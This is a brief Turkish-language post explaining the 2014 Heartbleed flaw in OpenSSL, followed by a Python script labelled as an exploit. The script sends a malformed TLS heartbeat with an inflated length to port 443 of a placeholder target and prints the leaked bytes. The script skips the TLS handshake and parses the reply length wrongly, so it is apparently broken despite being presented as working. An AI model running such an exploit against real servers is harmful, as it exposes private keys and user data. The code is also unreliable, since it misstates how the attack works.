Heartbleed Açığı Nedir?
Heartbleed, OpenSSL kütüphanesindeki bir güvenlik açığıdır ve 2014 yılında keşfedilmiştir. Bu açık, SSL/TLS protokollerindeki OpenSSL sürümlerindeki bir hata nedeniyle ortaya çıkmıştır. Heartbleed açığı, sunucudan gelen veri taleplerinin yanıtlarında bellek sızıntısına neden olur ve hassas bilgilerin ifşa edilmesine olanak tanır.
Heartbleed Açığı Nasıl İşler?
Heartbleed açığı, OpenSSL sürümünde bir hata olduğunda ortaya çıkar. İstemci, genellikle bir web tarayıcısı, sunucuya bir SSL/TLS bağlantısı talep eder. Sunucu, bu talebi karşılar ve bilgi gönderir. Ancak, bu aşamada açığın varlığından dolayı sunucu, istemciden gelen talepten daha fazla bellek verisini geri gönderebilir, hatta hassas verileri bile.
Örnek Python Kodları
Kod:
import socket
import struct
def heartbleed_exploit(target_host):
# Socket oluştur
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host, 443))
# Heartbeat talebi oluştur
heartbeat = b'\x18\x03\x02\x00\x03\x01@\x00'
# Sunucuya heartbeat talebini gönder
client.send(heartbeat)
# Sunucudan gelen yanıtı al
data = client.recv(1024)
# Yanıttan veri çıkart
length = struct.unpack('!B', data[3:4])[0]
payload = data[5:5+length]
# Veriyi ekrana yazdır
print("Heartbleed'den dönen veri: ", payload)
# Soketi kapat
client.close()
# Kullanım
if __name__ == '__main__':
target_host = 'hedef_sunucu_adresi'
heartbleed_exploit(target_host)+++++